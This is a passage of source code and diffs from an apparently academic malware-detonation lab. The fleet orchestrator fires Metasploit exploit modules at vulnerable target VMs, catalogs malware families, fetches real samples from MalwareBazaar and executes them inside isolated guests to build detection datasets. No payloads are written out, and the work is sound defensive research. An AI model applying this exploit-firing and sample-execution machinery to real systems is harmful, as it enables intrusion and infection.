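    max_by_load = max(1, max_by_cores // 2) if busy else max_by_cores
    return {
        "max_by_cores": max_by_cores,
        "max_by_ram": max_by_ram,
        "max_by_load": max_by_load,
        "max_concurrent": min(max_by_cores, max_by_ram, max_by_load),
    }


# 16 cores, 16 GiB total, 4 GiB available, light load: RAM is the binding cap.
ram_bound = plan_capacity(16, 16384, 4096, 2.0)
# 8 cores, 32 GiB total, plenty available, load 7.0: load is the binding cap.
load_bound = plan_capacity(8, 32768, 30000, 7.0)
```

In the first case the headroom is 2048 MiB, leaving 2048 MiB for guests, so six 320 MiB VMs fit even though 14 cores are free.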
# ---------------------------------------------------------------------------
# Per-slot episode execution
# ---------------------------------------------------------------------------


@dataclass
class SlotResult:
    slot: int
    sample_name: str
    sample_kind: str
    episode_id: str | None
    rc: int
    duration_s: float
    tier: str = "tier2"  # "tier3" when an exploit fired
    module_name: str | None = None  # exploit module identifier (Tier 3 only)
    error: str | None = None
    extra: dict = field(default_factory=dict)


def _run_slot(
    cfg: FleetConfig,
    slot: int,
    sample: Sample,
    episode_index: int,
    capacity: FleetCapacity,
) -> SlotResult:
    """Run one episode in a dedicated slot.

    Dispatch:
      - Tier 3 (default when msfrpcd is listening AND a module catalog
        is populated): real exploit fire via run_tier3_demo.py with a
        deterministically-selected module + sample.
      - Tier 2 (fallback): no exploit; the controller drives a labeled
        workload directly via the serial console. Recorded in
        SlotResult.tier so trainers can filter the no-exploit episodes.
    """
    # Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
    # this, parallel slots rmtree each other's run dir mid-boot.
    run_dir_base = "/tmp/cis490-vm-fleet"

    # Decide tier.
    bridge_iface = os.environ.get("BRIDGE") or None
    # Filter the catalog to modules that can actually fire under the
    # current launcher mode. Reverse / bind shells require the host-
    # only bridge (no SLIRP+restrict=on guest egress), so skip those
    # when BRIDGE isn't set; otherwise the exploit fires but the
    # session never lands and the episode degenerates to a 30 s
    # session_open_timeout.
    if cfg.modules:
        if bridge_iface:
            usable_modules = dict(cfg.modules)
        else:
            usable_modules = {
                k: v for k, v in cfg.modules.items() if not v.requires_bridge
            }
    else:
        usable_modules = {}
    tier3_ready = (
        not cfg.force_tier2
        and bool(usable_modules)
        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
    )

    env = os.environ.copy()
    env["SLOT"] = str(slot)
    env["SAMPLE_NAME"] = sample.name
    env["SAMPLE_PROFILE"] = sample.profile
    env["SAMPLE_KIND"] = sample.kind
    env["FLEET_HOST_ID"] = cfg.host_id
    env["FLEET_EPISODE_INDEX"] = str(episode_index)
    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)

    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
    py = str(venv_py) if venv_py.exists() else "python3"

    log_dir = cfg.data_root / "fleet-logs"
    log_dir.mkdir(parents=True, exist_ok=True)
    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"

    if tier3_ready:
        module = select_module(
            usable_modules,
            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
        )
        target_port = module_target_port(module) or 21
        # Per-slot runner dir for the target VM.
        run_dir = f"{run_dir_base}-target-{slot}"
        env["RUN_DIR"] = run_dir
        # Each slot gets a unique host-side hostfwd port so concurrent
        # targets don't collide on the loopback port.
        env["PORT_BASE"] = str(target_port + slot * 1000)
        if bridge_iface:
            env["BRIDGE"] = bridge_iface
        cmd = [
            py,
            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
            "--data-root", str(cfg.data_root),
            "--run-dir", run_dir,
            "--module", module.name,
            "--sample", sample.name,
            "--target-port", str(target_port + slot * 1000),
        ]
        tier = "tier3"
        module_name: str | None = module.name
    else:
        run_dir = f"{run_dir_base}-{slot}"
        env["RUN_DIR"] = run_dir
        cmd = [
            py,
            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
            "--data-root", str(cfg.data_root),
            "--run-dir", run_dir,
            "--sample", sample.name,
        ]
        tier = "tier2"
        module_name = None
        if not cfg.force_tier2 and not cfg.modules:
            log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
        elif not cfg.force_tier2:
            log.warning("slot=%d falling back to Tier 2: no usable module or msfrpcd unreachable at %s:%d",
                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)

    log.info(
        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
        slot, episode_index, tier, sample.name, module_name, run_dir,
    )

    started = time.monotonic()
    try:
        with out_log.open("ab") as logf:
            proc = subprocess.run(
                cmd,
                cwd=str(cfg.repo_root),
                env=env,
                stdout=logf,
                stderr=subprocess.STDOUT,
                check=False,
            )
        rc = proc.returncode
        err = None
    except (OSError, subprocess.SubprocessError) as e:
        rc = -1
        err = str(e)
    duration = time.monotonic() - started

    return SlotResult(
        slot=slot,
        sample_name=sample.name,
        sample_kind=sample.kind,
        episode_id=None,
        rc=rc,
        duration_s=duration,
        tier=tier,
        module_name=module_name,
        error=err,
    )
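The per-slot port offset used in the Tier-3 branch (`target_port + slot * 1000`) can leave the valid TCP range on hosts with many slots. Below is a minimal sketch of the same derivation with a range check; `slot_port` and its `stride` parameter are hypothetical and do not exist in the module.

```python
def slot_port(target_port: int, slot: int, stride: int = 1000) -> int:
    """Derive a distinct host-side port for a slot, rejecting invalid results."""
    port = target_port + slot * stride
    if not 0 < port <= 65535:
        raise ValueError(f"slot {slot} maps to port {port}, outside 1..65535")
    return port


first = slot_port(21, 0)   # slot 0 keeps the module's own port
fourth = slot_port(21, 3)  # later slots are shifted by 1000 each

try:
    slot_port(21, 66)      # 21 + 66000 exceeds the TCP port range
    overflow_rejected = False
except ValueError:
    overflow_rejected = True
```

With a stride of 1000 and a base port of 21, slots 0 through 65 stay in range, which is likely beyond what the capacity heuristic would allow on typical lab hosts.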
# ---------------------------------------------------------------------------
# FleetRunner
# ---------------------------------------------------------------------------


@dataclass
class FleetRunResult:
    capacity: FleetCapacity
    slots: list[SlotResult]
    total_duration_s: float


class FleetRunner:
    def __init__(self, cfg: FleetConfig) -> None:
        self.cfg = cfg
        self._stop = threading.Event()

    def stop(self) -> None:
        self._stop.set()

    def run(
        self,
        *,
        episodes: int = 1,
        episode_index_base: int = 0,
        capacity_override: FleetCapacity | None = None,
    ) -> FleetRunResult:
        capacity = capacity_override or detect_capacity(
            ram_per_vm_mib=self.cfg.ram_per_vm_mib,
        )
        n_slots = capacity.max_concurrent
        if self.cfg.max_concurrent_override is not None:
            n_slots = min(n_slots, self.cfg.max_concurrent_override)
        if n_slots <= 0:
            log.warning(
                "fleet capacity is zero (%s); cannot run", capacity.rationale,
            )
            return FleetRunResult(
                capacity=capacity, slots=[], total_duration_s=0.0,
            )

        log.info(
            "fleet host=%s slots=%d episodes=%d manifest_size=%d",
            self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
        )

        all_results: list[SlotResult] = []
        t_start = time.monotonic()
        for ep in range(episodes):
            if self._stop.is_set():
                break
            episode_index = episode_index_base + ep
            slot_samples = [
                self.cfg.manifest.select(
                    host_id=self.cfg.host_id,
                    slot=slot,
                    episode_index=episode_index,
                )
                for slot in range(n_slots)
            ]
            if self.cfg.require_real_samples:
                slot_samples = [s for s in slot_samples if s.kind == "real"]
                if not slot_samples:
                    log.warning("require_real_samples: no real samples in manifest; skipping wave")
                    continue

            log.info(
                "wave %d/%d: %s",
                ep + 1, episodes,
                [(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
            )

            with ThreadPoolExecutor(max_workers=n_slots) as pool:
                futures = [
                    pool.submit(
                        _run_slot, self.cfg, slot, sample, episode_index, capacity,
                    )
                    for slot, sample in enumerate(slot_samples)
                ]
                for fut in as_completed(futures):
                    res = fut.result()
                    log.info(
                        "slot %d sample=%s rc=%d duration=%.1fs",
                        res.slot, res.sample_name, res.rc, res.duration_s,
                    )
                    all_results.append(res)

        total = time.monotonic() - t_start
        return FleetRunResult(
            capacity=capacity,
            slots=all_results,
            total_duration_s=total,
        )
# ---------------------------------------------------------------------------
|
||||
# Friendly capacity report (used by tools/run_fleet.py --capacity)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def capacity_report() -> str:
|
||||
c = detect_capacity()
|
||||
return (
|
||||
f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
|
||||
f"ram: {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
|
||||
f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
|
||||
f"load: 1m={c.load_1m:.2f}\n"
|
||||
f"caps: by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
|
||||
f"by_load={c.max_by_load}\n"
|
||||
f"--> max_concurrent VMs: {c.max_concurrent}\n"
|
||||
)
|
||||
|
|
@ -6,6 +6,7 @@ requires-python = ">=3.11"
|
|||
dependencies = [
|
||||
"starlette>=0.36",
|
||||
"uvicorn[standard]>=0.27",
|
||||
"msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver
|
||||
]
|
||||
|
||||
[dependency-groups]
|
||||
|
|
|
|||
|
|
@ -2,6 +2,7 @@ from __future__ import annotations
|
|||
|
||||
import logging
|
||||
import secrets
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Awaitable, Callable
|
||||
|
||||
|
|
@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")
|
|||
|
||||
|
||||
SUFFIX = ".tar.zst"
|
||||
SCHEMA_VERSION = 1
|
||||
|
||||
|
||||
def _bearer_check(request: Request, expected: str | None) -> Response | None:
|
||||
|
|
@ -40,6 +42,23 @@ def make_app(
|
|||
async def health(request: Request) -> JSONResponse:
|
||||
return JSONResponse({"status": "ok"})
|
||||
|
||||
async def ping(request: Request) -> JSONResponse:
|
||||
"""Smoke-test endpoint. Verifies that the auth layer and the
|
||||
WG/Caddy/receiver pipe are alive end-to-end without persisting
|
||||
anything — index.jsonl is untouched. Used by ``cis490-shipper
|
||||
--ping`` during initial bring-up of a new lab host."""
|
||||
guard = _bearer_check(request, bearer_token)
|
||||
if guard is not None:
|
||||
return guard
|
||||
return JSONResponse(
|
||||
{
|
||||
"ok": True,
|
||||
"host_id": request.headers.get("x-lab-host"),
|
||||
"t_wall_ns": time.time_ns(),
|
||||
"schema_version": SCHEMA_VERSION,
|
||||
}
|
||||
)
|
||||
|
||||
async def put_episode(request: Request) -> JSONResponse:
|
||||
guard = _bearer_check(request, bearer_token)
|
||||
if guard is not None:
|
||||
|
|
@ -124,6 +143,7 @@ def make_app(
|
|||
|
||||
routes = [
|
||||
Route("/v1/health", health, methods=["GET"]),
|
||||
Route("/v1/ping", ping, methods=["POST"]),
|
||||
Route(
|
||||
"/v1/episodes/{host_id}/{filename}",
|
||||
put_episode,
|
||||
|
|
|
|||
|
|
@ -1,33 +1,107 @@
|
|||
# samples/
|
||||
|
||||
**Sample binaries are NEVER committed to this repo.** This directory holds:
|
||||
Catalog of malware (or behaviour-matched mimics) the fleet draws from.
|
||||
**Sample binaries are NEVER committed to this repo.**
|
||||
|
||||
- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
|
||||
(source, category, expected behavior, target CVE).
|
||||
- `fetch.py` — script that pulls samples from configured sources
|
||||
(MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
|
||||
under `samples/store/` (gitignored).
|
||||
- Per-sample notes in markdown describing observed behavior in our lab.
|
||||
## What's here
|
||||
|
||||
`samples/store/` lives only on the lab host. It is gitignored *and* should
|
||||
sit on a disk that is not auto-mounted on developer workstations.
|
||||
|
||||
## Manifest entry shape (placeholder)
|
||||
|
||||
```yaml
|
||||
samples:
|
||||
- name: linux.miner.xmrig.elf
|
||||
sha256: "..." # pinned
|
||||
source: MalwareBazaar
|
||||
category: miner
|
||||
target_cve: null # cryptominers are usually post-exploit payloads
|
||||
behavior: "high CPU, periodic stratum protocol traffic"
|
||||
pairs_with_exploit: exploit/multi/samba/usermap_script
|
||||
```
|
||||
manifest.toml schema-checked catalog (loaded by samples/manifest.py)
|
||||
manifest.py loader + per-(host_id, slot, ep) deterministic selection
|
||||
store/ SHA-256-pinned binary content (gitignored — never commit)
|
||||
.bazaar.token MalwareBazaar API key (mode 0600, gitignored)
|
||||
```
|
||||
|
||||
## Manifest schema
|
||||
|
||||
Each entry in `manifest.toml`:
|
||||
|
||||
```toml
|
||||
[[sample]]
|
||||
name = "xmrig-cryptominer" # unique within manifest, DNS-safe
|
||||
family = "XMRig" # canonical family label for ML
|
||||
category = "cryptominer" # one of: cryptominer, botnet, ransomware,
|
||||
# banking-trojan, fileless, rat, worm,
|
||||
# loader, wiper, other
|
||||
profile = "cpu-saturate" # behaviour profile from
|
||||
# exploits/workloads.py — gates the
|
||||
# in-session shell workload when no
|
||||
# real binary is staged
|
||||
description = "..."
|
||||
|
||||
# Optional — present iff this is a real binary the fetcher should pull:
|
||||
sha256 = "abc123..."
|
||||
source = "MalwareBazaar"
|
||||
url = "https://bazaar.abuse.ch/sample/abc123/"
|
||||
```
|
||||
|
||||
The loader rejects unknown categories and duplicate names. See
|
||||
`tests/test_fleet.py` for the property tests covering selection
|
||||
distribution + catalog walkability.
|
||||
|
||||
## "real" vs "mimic"
|
||||
|
||||
`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
|
||||
|
||||
- **Mimic** — the orchestrator runs the matching profile-shaped shell
|
||||
command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
|
||||
low-and-slow / shell-resident) inside the guest. No real binary
|
||||
needed; useful right now for testing the dataset pipeline and as
|
||||
the realistic-but-safe envelope class the trainer expects.
|
||||
- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
|
||||
`samples/store/<sha256>` into the shell session, sha256-verifies on
|
||||
the guest side, and execs it. Hash mismatch fail-stops the run; a
|
||||
tampered binary is never executed.
|
||||
|
||||
`meta.sample.kind` lands in every episode's `meta.json`, so trainers
|
||||
can stratify on it (the realistic-model path consumes only
|
||||
`kind == "real"` episodes by default).
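
A minimal sketch of how a trainer might stratify on that field, assuming each episode's `meta.json` has already been loaded into a dict with a nested `sample.kind` key. The `split_by_kind` helper and the example records are hypothetical, not part of the repo.

```python
from collections import defaultdict


def split_by_kind(metas: list[dict]) -> dict[str, list[dict]]:
    """Group episode metadata dicts by meta["sample"]["kind"]."""
    groups: dict[str, list[dict]] = defaultdict(list)
    for meta in metas:
        groups[meta["sample"]["kind"]].append(meta)
    return dict(groups)


# Placeholder records standing in for parsed meta.json files.
episodes = [
    {"episode": 0, "sample": {"name": "xmrig-cryptominer", "kind": "mimic"}},
    {"episode": 1, "sample": {"name": "some-real-sample", "kind": "real"}},
    {"episode": 2, "sample": {"name": "mirai-class-bot", "kind": "mimic"}},
]

by_kind = split_by_kind(episodes)
# The realistic-model path would keep only the "real" group.
real_only = by_kind.get("real", [])
```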
|
||||
|
||||
## Fetching a real binary
|
||||
|
||||
```sh
|
||||
# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
|
||||
echo "<your-key>" > samples/.bazaar.token
|
||||
chmod 0600 samples/.bazaar.token
|
||||
|
||||
# 2. Add an entry with sha256+source+url to manifest.toml.
|
||||
|
||||
# 3. Pull the binary into samples/store/<sha256>:
|
||||
uv run python tools/fetch_sample.py <sha256>
|
||||
```
|
||||
|
||||
Idempotent — re-running checks the staged copy's sha256 and skips the
|
||||
download if it already matches.
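
The idempotency check can be sketched as below. This is not the code in `tools/fetch_sample.py`; `sha256_of` and `needs_download` are illustrative names, and the demo uses a temporary directory with harmless placeholder bytes instead of `samples/store/`.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            h.update(chunk)
    return h.hexdigest()


def needs_download(store_root: Path, expected_sha256: str) -> bool:
    """True unless a staged file named <sha256> exists and hashes to that name."""
    staged = store_root / expected_sha256
    return not (staged.is_file() and sha256_of(staged) == expected_sha256)


with tempfile.TemporaryDirectory() as tmp:
    store = Path(tmp)
    payload = b"harmless placeholder bytes"
    digest = hashlib.sha256(payload).hexdigest()

    before = needs_download(store, digest)    # nothing staged yet
    (store / digest).write_bytes(payload)
    after = needs_download(store, digest)     # staged copy matches
    (store / digest).write_bytes(b"tampered")
    tampered = needs_download(store, digest)  # staged copy no longer matches
```

Naming the staged file after its own digest means the check needs no side index: the filename is the expected hash.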
|
||||
|
||||
## Per-(host, slot, episode) selection
|
||||
|
||||
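`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
hashes those three into a uniform integer and indexes the catalog.
Two lab hosts on the same slot usually pick *different* samples (collision
rate ~1/N for a catalog of N entries). Each pick is an independent hash
rather than a step through a permutation, so a single host can repeat a
sample before it has seen the whole catalog; covering all N entries takes
roughly N·ln N picks on average (one pick per slot per episode).
No coordinator.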
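
The selection rule can be sketched as follows, mirroring the hashing in `samples/manifest.py`. The host ID `lab-a` and the helper names are placeholders for this example. The last helper counts how many picks one host needs on a fixed slot before it has seen every catalog entry, which is a quick way to check coverage for a given catalog size.

```python
import hashlib


def select_index(host_id: str, slot: int, episode_index: int, n: int) -> int:
    """Map (host_id, slot, episode_index) to a catalog index in [0, n)."""
    seed = f"{host_id}|{slot}|{episode_index}".encode()
    digest = hashlib.sha256(seed).digest()
    # The first 8 bytes of the digest are treated as a big-endian integer.
    return int.from_bytes(digest[:8], "big") % n


CATALOG = [
    "xmrig-cryptominer", "mirai-class-bot", "ransomware-mimic",
    "dridex-class-trojan", "kovter-class-stealth", "reverse-shell-resident",
]


def picks_until_full_coverage(host_id: str, n: int, slot: int = 0,
                              limit: int = 10_000) -> int:
    """Count episodes on one slot until every index has appeared at least once."""
    seen: set[int] = set()
    for episode_index in range(limit):
        seen.add(select_index(host_id, slot, episode_index, n))
        if len(seen) == n:
            return episode_index + 1
    raise RuntimeError("catalog not covered within limit")


first = select_index("lab-a", 0, 0, len(CATALOG))
again = select_index("lab-a", 0, 0, len(CATALOG))  # same inputs, same index
coverage = picks_until_full_coverage("lab-a", len(CATALOG))
```

Because the index depends only on the three inputs, any episode can be replayed later by passing the same `(host_id, slot, episode_index)`.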
|
||||
|
||||
## Safety rules
|
||||
|
||||
- Only download to the lab host, never to a developer workstation.
|
||||
- Verify sha256 immediately, before any other read.
|
||||
- Keep the directory on a path that is *not* on the WG overlay.
|
||||
- Re-verify sha256 before each detonation; refuse to run on mismatch.
|
||||
- **Only download to a lab host, never to a developer workstation.**
|
||||
`samples/store/` lives only there, gitignored, on a disk that is
|
||||
not auto-mounted elsewhere.
|
||||
- The lab host's `br-malware` bridge is host-only by design (no NAT,
|
||||
no route). Real malware running in the guest cannot call out unless
|
||||
the operator explicitly opens egress, which we don't.
|
||||
- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
|
||||
`loadvm`) means every fresh episode starts from a known-good
|
||||
baseline regardless of what the previous one did to the guest.
|
||||
- The fetcher verifies sha256 on download; the driver verifies again
|
||||
in-guest before exec. Both layers must match the manifest.
|
||||
|
||||
## Adding a sample
|
||||
|
||||
1. Pick a `family` + `category` from the closed enum above.
|
||||
2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
|
||||
sample's behaviour doesn't match any of the six existing shapes,
|
||||
add a new factory to `exploits/workloads.py` *first*, with tests.
|
||||
3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
|
||||
verify the staged file's hash matches.
|
||||
4. Append the entry to `manifest.toml`.
|
||||
5. Run the test suite — the manifest loader's invariants catch typos.
|
||||
|
|
|
|||
0
samples/__init__.py
Normal file
113
samples/manifest.py
Normal file
|
|
@ -0,0 +1,113 @@
|
|||
"""Sample manifest loader + per-(host, slot) deterministic selection.
|
||||
|
||||
The manifest at ``samples/manifest.toml`` defines the catalog of
|
||||
samples (real or mimic) the fleet draws from. Selection is
|
||||
**deterministic** given ``(host_id, slot, episode_index)``, so two lab
hosts on the same fleet usually pick *different* samples for the same slot
index. Picks are independent hashes, not a permutation, so a host may
repeat a sample before it has covered the whole catalog.
|
||||
|
||||
This gives us "all hosts on the network generating novel data" without
|
||||
needing a coordinator: every host's `host_id` seeds its own
|
||||
sample-rotation order, and the orderings spread across the catalog.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import tomllib
|
||||
from dataclasses import dataclass, field
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
_VALID_CATEGORIES = {
|
||||
"cryptominer", "botnet", "ransomware", "banking-trojan",
|
||||
"fileless", "rat", "worm", "loader", "wiper", "other",
|
||||
}
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Sample:
|
||||
name: str
|
||||
family: str
|
||||
category: str
|
||||
profile: str
|
||||
description: str = ""
|
||||
source: str | None = None
|
||||
sha256: str | None = None
|
||||
url: str | None = None
|
||||
|
||||
@property
|
||||
def kind(self) -> str:
|
||||
"""``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
|
||||
Trainers filter on this so the realistic-model pipeline only
|
||||
consumes real-malware episodes."""
|
||||
return "real" if self.sha256 else "mimic"
|
||||
|
||||
def binary_path(self, store_root: Path) -> Path | None:
|
||||
"""Resolved path of the staged binary, or None if this sample
|
||||
has no sha256 (mimic) or the binary hasn't been fetched yet."""
|
||||
if not self.sha256:
|
||||
return None
|
||||
p = Path(store_root) / self.sha256
|
||||
return p if p.exists() else None
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class SampleManifest:
|
||||
samples: list[Sample] = field(default_factory=list)
|
||||
|
||||
def __len__(self) -> int:
|
||||
return len(self.samples)
|
||||
|
||||
def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
|
||||
"""Deterministic selection. The host_id mixes into the seed so
|
||||
different hosts visit the catalog in different orders; slot +
|
||||
episode_index tick within a host. Same inputs always give the
|
||||
same sample — replay-friendly for debugging."""
|
||||
if not self.samples:
|
||||
raise ValueError("manifest is empty")
|
||||
# SHA-256 of the seed gives a uniformly distributed integer.
|
||||
seed = f"{host_id}|{slot}|{episode_index}".encode()
|
||||
h = hashlib.sha256(seed).digest()
|
||||
idx = int.from_bytes(h[:8], "big") % len(self.samples)
|
||||
return self.samples[idx]
|
||||
|
||||
@classmethod
|
||||
def load(cls, path: str | Path) -> "SampleManifest":
|
||||
with open(path, "rb") as f:
|
||||
data = tomllib.load(f)
|
||||
raw = data.get("sample") or []
|
||||
if not isinstance(raw, list):
|
||||
raise ValueError(f"{path}: 'sample' must be an array of tables")
|
||||
|
||||
samples: list[Sample] = []
|
||||
for i, entry in enumerate(raw):
|
||||
if not isinstance(entry, dict):
|
||||
raise ValueError(f"{path}: sample[{i}] is not a table")
|
||||
for key in ("name", "family", "category", "profile"):
|
||||
if not isinstance(entry.get(key), str) or not entry[key]:
|
||||
raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
|
||||
if entry["category"] not in _VALID_CATEGORIES:
|
||||
raise ValueError(
|
||||
f"{path}: sample[{i}] category {entry['category']!r} "
|
||||
f"not in {sorted(_VALID_CATEGORIES)}"
|
||||
)
|
||||
samples.append(Sample(
|
||||
name=entry["name"],
|
||||
family=entry["family"],
|
||||
category=entry["category"],
|
||||
profile=entry["profile"],
|
||||
description=entry.get("description", ""),
|
||||
source=entry.get("source"),
|
||||
sha256=entry.get("sha256"),
|
||||
url=entry.get("url"),
|
||||
))
|
||||
|
||||
# Reject duplicate names — trainers join on this.
|
||||
seen: set[str] = set()
|
||||
for s in samples:
|
||||
if s.name in seen:
|
||||
raise ValueError(f"{path}: duplicate sample name {s.name!r}")
|
||||
seen.add(s.name)
|
||||
|
||||
return cls(samples=samples)
|
||||
61
samples/manifest.toml
Normal file
|
|
@ -0,0 +1,61 @@
|
|||
# Sample manifest — what each fleet slot picks from.
|
||||
#
|
||||
# Each entry has three things:
|
||||
# - identity (name, family, category) for labeling
|
||||
# - acquisition (source, sha256, url) for reproducibility
|
||||
# - behaviour (profile) so the synthetic load mimic can run a
# reasonable proxy until the real sample lands at samples/store/
|
||||
#
|
||||
# When the real malware binary is present at samples/store/<sha256>,
|
||||
# the orchestrator runs THAT inside the guest. When it's absent, the
|
||||
# orchestrator falls back to running tools/load_mimic.py with the
|
||||
# matching profile so the fleet still produces *labeled, varied* data
|
||||
# while we collect the real samples. Either way, meta.json records
|
||||
# which path the episode took, so trainers can filter on
|
||||
# meta.sample.kind ∈ {real, mimic}.
|
||||
|
||||
[[sample]]
|
||||
name = "xmrig-cryptominer"
|
||||
family = "XMRig"
|
||||
category = "cryptominer"
|
||||
profile = "cpu-saturate"
|
||||
# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
|
||||
# source = "MalwareBazaar"
|
||||
# sha256 = "TBD"
|
||||
# url = "https://bazaar.abuse.ch/sample/TBD/"
|
||||
description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
|
||||
|
||||
[[sample]]
|
||||
name = "mirai-class-bot"
|
||||
family = "Mirai"
|
||||
category = "botnet"
|
||||
profile = "scan-and-dial"
|
||||
description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
|
||||
|
||||
[[sample]]
|
||||
name = "ransomware-mimic"
|
||||
family = "Cryptolocker-class"
|
||||
category = "ransomware"
|
||||
profile = "io-walk"
|
||||
description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
|
||||
|
||||
[[sample]]
|
||||
name = "dridex-class-trojan"
|
||||
family = "Dridex"
|
||||
category = "banking-trojan"
|
||||
profile = "bursty-c2"
|
||||
description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
|
||||
|
||||
[[sample]]
|
||||
name = "kovter-class-stealth"
|
||||
family = "Kovter"
|
||||
category = "fileless"
|
||||
profile = "low-and-slow"
|
||||
description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
|
||||
|
||||
[[sample]]
|
||||
name = "reverse-shell-resident"
|
||||
family = "Reverse-Shell"
|
||||
category = "rat"
|
||||
profile = "shell-resident"
|
||||
description = "Single TCP socket pinned to an attacker IP, occasional command bursts."
|
||||
62
scripts/fetch-alpine-baseline.sh
Executable file
|
|
@ -0,0 +1,62 @@
|
|||
#!/usr/bin/env bash
|
||||
# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
# baseline guest. The upstream image is already qcow2, so no conversion
# is done; verify sha512 against the value pinned in docs/sources.md.
|
||||
#
|
||||
# Usage:
|
||||
# scripts/fetch-alpine-baseline.sh <out_path>
|
||||
#
|
||||
# Examples:
|
||||
# scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
|
||||
# sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
|
||||
#
|
||||
# Idempotent — re-runs check the destination and short-circuit if the
|
||||
# checksum already matches.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
OUT="${1:-}"
|
||||
if [[ -z "$OUT" ]]; then
|
||||
echo "usage: $0 <out_path>" >&2
|
||||
exit 2
|
||||
fi
|
||||
|
||||
URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
|
||||
SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
|
||||
|
||||
log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
|
||||
|
||||
if [[ -f "$OUT" ]]; then
|
||||
actual="$(sha512sum "$OUT" | awk '{print $1}')"
|
||||
if [[ "$actual" == "$SHA512" ]]; then
|
||||
log "$OUT already present and verified"
|
||||
exit 0
|
||||
fi
|
||||
log "$OUT exists but checksum differs — refetching"
|
||||
rm -f "$OUT"
|
||||
fi
|
||||
|
||||
mkdir -p "$(dirname "$OUT")"
|
||||
TMP="$OUT.partial"
|
||||
trap 'rm -f "$TMP"' EXIT
|
||||
|
||||
log "downloading $URL"
|
||||
if command -v curl >/dev/null; then
|
||||
curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
|
||||
elif command -v wget >/dev/null; then
|
||||
wget -O "$TMP" "$URL"
|
||||
else
|
||||
log "neither curl nor wget on PATH"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
log "verifying sha512"
|
||||
actual="$(sha512sum "$TMP" | awk '{print $1}')"
|
||||
if [[ "$actual" != "$SHA512" ]]; then
|
||||
log "sha512 mismatch: expected $SHA512, got $actual"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mv "$TMP" "$OUT"
|
||||
trap - EXIT
|
||||
log "wrote $OUT ($(stat -c%s "$OUT") bytes)"
|
||||
69
scripts/fetch-metasploitable2.sh
Executable file
|
|
@ -0,0 +1,69 @@
|
|||
#!/usr/bin/env bash
|
||||
# Fetch + sha256-verify the Metasploitable2 disk image.
|
||||
#
|
||||
# Rapid7's official download is gated behind a registration form, so
# the URL + sha256 must be supplied via env vars; no defaults are baked
# in. The user installs this once per lab host.
|
||||
#
|
||||
# Inputs (env):
|
||||
# IMAGE_URL — direct download URL for the metasploitable2 archive
|
||||
# IMAGE_SHA256 — expected sha256 of the archive
|
||||
# OUT_DIR — where to drop the qcow2 (default vm/images/)
|
||||
#
|
||||
# Outputs:
|
||||
# $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
|
||||
# if needed.
|
||||
#
|
||||
# We do NOT bake an image url+hash into the repo because the canonical
|
||||
# distribution is a registration-walled zip on Rapid7. Operators must
|
||||
# supply both; the rest is mechanical.
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
IMAGE_URL="${IMAGE_URL:-}"
|
||||
